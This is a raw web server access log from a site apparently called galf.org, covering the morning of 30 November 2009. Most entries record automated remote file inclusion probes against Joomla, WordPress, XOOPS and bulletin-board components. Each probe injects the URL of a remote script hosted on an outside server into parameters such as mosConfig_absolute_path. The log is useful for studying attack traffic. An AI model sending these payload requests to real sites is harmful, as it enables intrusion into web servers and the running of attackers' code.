211.233.89.196 - - [30/Nov/2009:03:53:44 -0800] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://aop.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.233.89.196 - - [30/Nov/2009:03:53:44 -0800] "GET /logs/access_090601.log%20%20//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://aop.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.233.89.196 - - [30/Nov/2009:03:53:44 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://aop.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.233.89.196 - - [30/Nov/2009:03:53:46 -0800] "GET /logs/access_090601.log%20%20//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://aop.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.233.89.196 - - [30/Nov/2009:03:53:46 -0800] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://aop.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.233.89.196 - - [30/Nov/2009:03:53:46 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://aop.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:03:56:30 -0800] "GET /logs/access_090622.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:03:56:30 -0800] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:03:56:30 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:03:57:25 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:03:57:25 -0800] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:03:57:28 -0800] "GET /logs/access_090622.log%20%20/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:03:57:29 -0800] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:03:57:29 -0800] "GET /logs/access_090622.log%20%20/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:03:57:30 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.72.246 - - [30/Nov/2009:03:57:37 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://mubankaii.no-ip.biz:8090//appserv/sid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.72.246 - - [30/Nov/2009:03:57:38 -0800] "GET /logs/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://mubankaii.no-ip.biz:8090//appserv/sid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.72.246 - - [30/Nov/2009:03:57:38 -0800] "GET /logs/access_090810.log/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://mubankaii.no-ip.biz:8090//appserv/sid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:03:58:10 -0800] "GET /logs/access_090622.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:03:58:12 -0800] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:03:58:12 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:03:58:14 -0800] "GET /logs/access_090622.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:03:58:17 -0800] "GET /logs/access_090622.log%20%20/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:03:58:21 -0800] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:03:58:25 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:04:01:28 -0800] "GET /logs/access_090622.log%20%20/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.22.119.110 - - [30/Nov/2009:04:02:09 -0800] "GET /logs/main.php?pagina=http://kelapa.fileave.com/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.22.119.110 - - [30/Nov/2009:04:02:09 -0800] "GET /main.php?pagina=http://kelapa.fileave.com/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.22.119.110 - - [30/Nov/2009:04:02:10 -0800] "GET /logs/access_090907.log/main.php?pagina=http://kelapa.fileave.com/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.22.119.110 - - [30/Nov/2009:04:02:19 -0800] "GET /logs/access_090907.log/main.php?pagina=http://kelapa.fileave.com/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.22.119.110 - - [30/Nov/2009:04:02:19 -0800] "GET /logs/main.php?pagina=http://kelapa.fileave.com/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.22.119.110 - - [30/Nov/2009:04:02:19 -0800] "GET /main.php?pagina=http://kelapa.fileave.com/a.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:04:02:58 -0800] "GET /logs/access_090622.log%20%20/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:04:03:00 -0800] "GET /logs/access_090622.log%20%20/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.201.82.173 - - [30/Nov/2009:04:03:15 -0800] "GET /logs//inc/cmses/aedating4CMS.php?dir[inc]=http://www.qatarsteel.com.qa/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.201.82.173 - - [30/Nov/2009:04:03:15 -0800] "GET /inc/cmses/aedating4CMS.php?dir[inc]=http://www.qatarsteel.com.qa/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.201.82.173 - - [30/Nov/2009:04:03:15 -0800] "GET /logs/access.log//inc/cmses/aedating4CMS.php?dir[inc]=http://www.qatarsteel.com.qa/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.201.82.173 - - [30/Nov/2009:04:03:17 -0800] "GET /inc/cmses/aedating4CMS.php?dir[inc]=http://www.qatarsteel.com.qa/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.201.82.173 - - [30/Nov/2009:04:03:17 -0800] "GET /logs//inc/cmses/aedating4CMS.php?dir[inc]=http://www.qatarsteel.com.qa/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.201.82.173 - - [30/Nov/2009:04:03:17 -0800] "GET /logs/access.log//inc/cmses/aedating4CMS.php?dir[inc]=http://www.qatarsteel.com.qa/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:04:03:23 -0800] "GET /logs/access_090622.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:04:03:42 -0800] "GET /logs/access_090622.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:04:05:40 -0800] "GET /logs/access_090622.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.22.119.110 - - [30/Nov/2009:04:07:11 -0800] "GET /logs/main.php?pagina=http://kelapa.fileave.com/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.22.119.110 - - [30/Nov/2009:04:07:11 -0800] "GET /main.php?pagina=http://kelapa.fileave.com/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.22.119.110 - - [30/Nov/2009:04:07:12 -0800] "GET /logs/access_090622.log%20%20/main.php?pagina=http://kelapa.fileave.com/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.22.119.110 - - [30/Nov/2009:04:07:15 -0800] "GET /main.php?pagina=http://kelapa.fileave.com/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.22.119.110 - - [30/Nov/2009:04:07:16 -0800] "GET /logs/access_090622.log%20%20/main.php?pagina=http://kelapa.fileave.com/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.22.119.110 - - [30/Nov/2009:04:07:16 -0800] "GET /logs/main.php?pagina=http://kelapa.fileave.com/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.66.28.36 - - [30/Nov/2009:04:08:30 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.66.28.36 - - [30/Nov/2009:04:08:30 -0800] "GET /logs/access.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.66.28.36 - - [30/Nov/2009:04:08:30 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
125.246.151.62 - - [30/Nov/2009:04:09:39 -0800] "GET /logs/access.log%20%20///?_zb_path=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
125.246.151.62 - - [30/Nov/2009:04:09:39 -0800] "GET /logs///?_zb_path=http://n34.biz/id1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "galf.org"
125.246.151.62 - - [30/Nov/2009:04:09:39 -0800] "GET //?_zb_path=http://n34.biz/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
67.195.115.117 - - [30/Nov/2009:04:10:30 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "galf.org"
67.195.115.117 - - [30/Nov/2009:04:10:31 -0800] "GET /?M=D HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "galf.org"
125.246.151.62 - - [30/Nov/2009:04:13:18 -0800] "GET //?_zb_path=http://n34.biz/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
125.246.151.62 - - [30/Nov/2009:04:13:18 -0800] "GET /logs///?_zb_path=http://n34.biz/id1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
125.246.151.62 - - [30/Nov/2009:04:13:18 -0800] "GET /logs/access_090622.log%20%20///?_zb_path=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.66.10 - - [30/Nov/2009:04:15:19 -0800] "GET /logs/access_091005.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.52.189.20 - - [30/Nov/2009:04:16:16 -0800] "GET /logs/access_090706.log/appserv/main.php?appserv_root=http://luvyadating.com/temp/cache/userimages/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.52.189.20 - - [30/Nov/2009:04:16:16 -0800] "GET /appserv/main.php?appserv_root=http://luvyadating.com/temp/cache/userimages/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.52.189.20 - - [30/Nov/2009:04:16:16 -0800] "GET /logs/appserv/main.php?appserv_root=http://luvyadating.com/temp/cache/userimages/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.52.189.20 - - [30/Nov/2009:04:16:39 -0800] "GET /logs/access_091102.log/appserv/main.php?appserv_root=http://luvyadating.com/temp/cache/userimages/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.52.189.20 - - [30/Nov/2009:04:16:48 -0800] "GET /appserv/main.php?appserv_root=http://luvyadating.com/temp/cache/userimages/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.52.189.20 - - [30/Nov/2009:04:16:48 -0800] "GET /logs/access_090706.log%20%20/appserv/main.php?appserv_root=http://luvyadating.com/temp/cache/userimages/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.52.189.20 - - [30/Nov/2009:04:16:48 -0800] "GET /logs/appserv/main.php?appserv_root=http://luvyadating.com/temp/cache/userimages/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.54.28.163 - - [30/Nov/2009:04:20:46 -0800] "GET /includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.groupe-rouquette.com/Jacquier/src//idste.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
193.200.255.18 - - [30/Nov/2009:04:21:34 -0800] "GET /?sourcedir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
193.200.255.18 - - [30/Nov/2009:04:21:34 -0800] "GET /logs/?sourcedir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
193.200.255.18 - - [30/Nov/2009:04:21:37 -0800] "GET /logs/access_090615.log/?sourcedir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.200.255.18 - - [30/Nov/2009:04:22:11 -0800] "GET /?sourcedir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
193.200.255.18 - - [30/Nov/2009:04:22:11 -0800] "GET /logs/access_090615.log/?sourcedir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.200.255.18 - - [30/Nov/2009:04:22:11 -0800] "GET /logs/?sourcedir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
193.200.255.18 - - [30/Nov/2009:04:23:47 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:04:24:36 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:04:24:36 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:04:24:36 -0800] "GET /logs/access_090615.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:04:24:59 -0800] "GET /logs/access_090601.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:04:25:11 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:04:25:11 -0800] "GET /logs/access_090615.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:04:25:11 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.200.255.18 - - [30/Nov/2009:04:25:29 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:04:25:29 -0800] "GET /logs/access_090601.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.66.28.36 - - [30/Nov/2009:04:25:52 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.66.28.36 - - [30/Nov/2009:04:25:52 -0800] "GET /logs/access.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.66.28.36 - - [30/Nov/2009:04:25:52 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
91.186.11.35 - - [30/Nov/2009:04:27:52 -0800] "GET /administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=http://stelsis.ru/clx/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.186.11.35 - - [30/Nov/2009:04:27:52 -0800] "GET /logs//administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=http://stelsis.ru/clx/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.186.11.35 - - [30/Nov/2009:04:28:03 -0800] "GET /logs/access_091116.log//administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=http://stelsis.ru/clx/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
193.200.255.18 - - [30/Nov/2009:04:28:34 -0800] "GET /logs/access_090921.log%20%20/?sourcedir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.200.255.18 - - [30/Nov/2009:04:28:57 -0800] "GET /logs/access_090921.log%20%20/?sourcedir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.22.119.110 - - [30/Nov/2009:04:31:33 -0800] "GET /logs/access_090622.log%20%20/index2.php?x=http://kelapa.fileave.com/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.22.119.110 - - [30/Nov/2009:04:31:33 -0800] "GET /index2.php?x=http://kelapa.fileave.com/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.22.119.110 - - [30/Nov/2009:04:31:33 -0800] "GET /logs/index2.php?x=http://kelapa.fileave.com/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.22.119.110 - - [30/Nov/2009:04:31:33 -0800] "GET /index2.php?x=http://kelapa.fileave.com/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.22.119.110 - - [30/Nov/2009:04:31:34 -0800] "GET /logs/index2.php?x=http://kelapa.fileave.com/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.22.119.110 - - [30/Nov/2009:04:31:34 -0800] "GET /logs/access_090622.log%20%20/index2.php?x=http://kelapa.fileave.com/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.203.109 - - [30/Nov/2009:04:31:47 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.203.109 - - [30/Nov/2009:04:31:47 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.203.109 - - [30/Nov/2009:04:31:47 -0800] "GET /logs/access_090720.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.203.109 - - [30/Nov/2009:04:32:09 -0800] "GET /logs/access_091116.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.26.26 - - [30/Nov/2009:04:32:32 -0800] "GET /logs/access_091116.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://mubankaii.no-ip.biz:8090//appserv/sid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [30/Nov/2009:04:34:07 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [30/Nov/2009:04:34:07 -0800] "GET /logs/access_090615.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [30/Nov/2009:04:34:07 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [30/Nov/2009:04:34:32 -0800] "GET /logs/access_090601.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.186.11.35 - - [30/Nov/2009:04:36:26 -0800] "GET /logs/access_090810.log//administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=http://stelsis.ru/clx/id3.txt?? HTTP/1.0" 404 - "-" "libwww-perl/5.831" "www.galf.org"
61.66.28.36 - - [30/Nov/2009:04:37:08 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.66.28.36 - - [30/Nov/2009:04:37:08 -0800] "GET /logs/access.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.66.28.36 - - [30/Nov/2009:04:37:13 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
75.126.127.34 - - [30/Nov/2009:04:37:30 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [30/Nov/2009:04:37:30 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [30/Nov/2009:04:37:30 -0800] "GET /logs/access_090615.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
